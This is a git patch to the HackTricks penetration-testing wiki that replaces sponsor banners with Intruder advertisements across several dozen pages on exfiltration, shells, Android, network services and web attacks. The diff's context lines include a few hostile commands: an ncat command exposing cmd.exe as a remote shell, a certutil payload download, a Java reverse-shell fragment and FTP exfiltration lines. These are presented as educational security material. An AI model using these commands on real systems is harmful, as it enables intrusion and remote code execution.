From 2463753c56bb3434f27d3c6dd91ab460de98d9b5 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sun, 3 Sep 2023 01:48:41 +0200 Subject: [PATCH] intruder --- .../exfiltration.md | 26 ++++++---- .../python/bypass-python-sandboxes/README.md | 52 ++++++++++--------- .../shells/linux.md | 23 ++++++++ .../shells/windows.md | 49 ++++------------- .../android-applications-basics.md | 51 +++++------------- .../android-task-hijacking.md | 14 +++++ .../make-apk-accept-ca-certificate.md | 13 +++++ mobile-pentesting/android-checklist.md | 30 +++++------ .../pentesting-ftp/README.md | 16 ++++++ .../pentesting-imap.md | 15 ++++++ .../README.md | 50 +++++------------- network-services-pentesting/pentesting-pop.md | 14 +++++ .../pentesting-smb/rpcclient-enumeration.md | 15 ++++++ .../pentesting-web/php-tricks-esp/php-ssrf.md | 15 ++++++ .../pentesting-web/tomcat.md | 15 ++++++ .../tomcat/basic-tomcat-info.md | 15 ++++++ pentesting-web/bypass-payment-process.md | 17 +++++- ...g-and-directory-interface-and-log4shell.md | 15 ++++++ pentesting-web/formula-doc-latex-injection.md | 15 ++++++ pentesting-web/h2c-smuggling.md | 15 ++++++ pentesting-web/hacking-with-cookies/README.md | 15 ++++++ .../cloud-ssrf.md | 23 ++++++++ .../url-format-bypass.md | 16 ++++++ .../css-injection/css-injection-code.md | 14 +++++ .../abusing-service-workers.md | 15 ++++++ reversing/common-api-used-in-malware.md | 14 +++++ .../reversing-tools-basic-methods/README.md | 24 +++++++++ stego/stego-tricks.md | 19 ++++--- todo/radio-hacking/flipper-zero/README.md | 15 ++++++ todo/radio-hacking/flipper-zero/fz-nfc.md | 15 ++++++ todo/radio-hacking/flipper-zero/fz-sub-ghz.md | 16 +++++- todo/radio-hacking/proxmark-3.md | 15 ++++++ .../acl-persistence-abuse/README.md | 23 ++++++++ .../lateral-movement/dcom-exec.md | 15 ++++++ .../powerup.md | 12 +++++ 35 files changed, 550 insertions(+), 176 deletions(-) 
diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index de81c8c35..a01f3f9ba 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -12,10 +12,13 @@ -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
-{% embed url="https://go.intigriti.com/hacktricks" %} +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Commonly whitelisted domains to exfiltrate information @@ -176,10 +179,13 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
-{% embed url="https://go.intigriti.com/hacktricks" %} +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## SMB @@ -388,10 +394,12 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -{% embed url="https://go.intigriti.com/hacktricks" %}
diff --git a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index b02ce5e4e..38b197b73 100644 --- a/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -1,13 +1,5 @@ # Bypass Python sandboxes -![](<../../../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -20,6 +12,14 @@ Get Access Today:
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + These are some tricks to bypass python sandbox protections and execute arbitrary commands. ## Command Execution Libraries @@ -348,13 +348,13 @@ with (a as b): pass ``` -![](<../../../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Builtins @@ -734,13 +734,13 @@ You can check the output of this script on this page: [Broken link](broken-reference) {% endcontent-ref %} -![](<../../../.gitbook/assets/image (9) (1) (2).png>) +
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** ## Python Format String @@ -1132,6 +1132,15 @@ will be bypassed * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -1144,10 +1153,3 @@ will be bypassed
-![](<../../../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/generic-methodologies-and-resources/shells/linux.md b/generic-methodologies-and-resources/shells/linux.md index 83001dd55..847c69ace 100644 --- a/generic-methodologies-and-resources/shells/linux.md +++ b/generic-methodologies-and-resources/shells/linux.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + **If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com) ## Full TTY @@ -170,6 +178,14 @@ victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl attacker> ncat -v 10.0.0.22 4444 --ssl ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Golang ```bash @@ -358,6 +374,13 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new {% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %} +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/generic-methodologies-and-resources/shells/windows.md b/generic-methodologies-and-resources/shells/windows.md index c8f88f0bf..e39e7d9a7 100644 --- a/generic-methodologies-and-resources/shells/windows.md +++ b/generic-methodologies-and-resources/shells/windows.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Lolbas @@ -329,22 +320,14 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil **Detected by defender** -
-**HackenProof is home to all crypto bug bounties.** +
-**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## **Cscript/Wscript** @@ -590,22 +573,12 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive ​ -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %}
diff --git a/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 6f965060b..e9e70cdac 100644 --- a/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Android Security Model @@ -136,22 +127,13 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers **Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term β€œSmali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**. -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Intents @@ -470,22 +452,13 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data. -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +***
diff --git a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md index e7a9cff52..e6366c0a7 100644 --- a/mobile-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/mobile-pentesting/android-app-pentesting/android-task-hijacking.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Task, Back Stack and Foreground Activities A task is a collection of activities that users interact with when performing a certain job. The activities are arranged in a stackβ€”the _**back stack**_)β€”in the order in which each activity is opened. @@ -88,6 +96,12 @@ Setting **`taskAffinity=""`** can be a quick fix for this issue. The launch mode * [**https://blog.dixitaditya.com/android-task-hijacking/**](https://blog.dixitaditya.com/android-task-hijacking/) * [**https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html**](https://blog.takemyhand.xyz/2021/02/android-task-hijacking-with.html) +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index f076ce4bf..f4e34b148 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -16,6 +16,13 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. @@ -62,6 +69,12 @@ Then save the file & back out of all the directories & rebuild the apk with the Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index 8bd7d3806..f0655cdf8 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,13 +1,5 @@ # Android APK Checklist -![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -20,6 +12,14 @@ Get Access Today:
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) @@ -74,6 +74,13 @@ Get Access Today: * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) + +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ @@ -86,10 +93,3 @@ Get Access Today:
-![](<../.gitbook/assets/image (9) (1) (2).png>) - -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 7debb5e52..ca748ff3e 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -12,6 +12,14 @@
+
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information The **File Transfer Protocol (FTP**) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.\ @@ -229,6 +237,14 @@ The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here, * `ftp` * `port:21` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## HackTricks Automatic Commands ``` diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md index 87ec7b014..c507472ab 100644 --- a/network-services-pentesting/pentesting-imap.md +++ b/network-services-pentesting/pentesting-imap.md @@ -16,6 +16,14 @@ +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Internet Message Access Protocol As its name implies, IMAP allows you to **access your email messages wherever you are**; much of the time, it is accessed via the Internet. Basically, email **messages are stored on servers**. Whenever you check your inbox, your email client contacts the server to connect you with your messages. When you read an email message using IMAP, **you aren't actually downloading** or storing it on your computer; instead, you are **reading it off of the server**. As a result, it's possible to check your email from **several different devices** without missing a thing. @@ -204,6 +212,13 @@ Entry_4: Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' ``` +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - πŸŽ™οΈ Twitch πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index eba355e1f..45e4fbf2e 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -12,22 +12,13 @@
-
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## Basic Information @@ -388,22 +379,14 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). -
-**HackenProof is home to all crypto bug bounties.** +
-**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## MSSQL Privilege Escalation @@ -541,22 +524,13 @@ You probably will be able to **escalate to Administrator** following one of thes ​ -
+
-**HackenProof is home to all crypto bug bounties.** +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. -**Get rewarded without delays**\ -HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified. +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -**Get experience in web3 pentesting**\ -Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days. - -**Become the web3 hacker legend**\ -Gain reputation points with each verified bug and conquer the top of the weekly leaderboard. - -[**Sign up on HackenProof**](https://hackenproof.com/register) start earning from your hacks! - -{% embed url="https://hackenproof.com/register" %} +*** ## HackTricks Automatic Commands diff --git a/network-services-pentesting/pentesting-pop.md b/network-services-pentesting/pentesting-pop.md index 96da95e95..2b413eed9 100644 --- a/network-services-pentesting/pentesting-pop.md +++ b/network-services-pentesting/pentesting-pop.md @@ -12,6 +12,14 @@ +
+ +Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. + +{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} + +*** + ## Basic Information **Post Office Protocol** (**POP**) is a type of computer networking and Internet standard **protocol** that extracts and retrieves email from a remote mail server for access by the host machine. **POP** is an application layer **protocol** in the OSI model that provides end users the ability to fetch and receive email (from [here](https://www.techopedia.com/definition/5383/post-office-protocol-pop)). @@ -151,6 +159,12 @@ Entry_6:
+
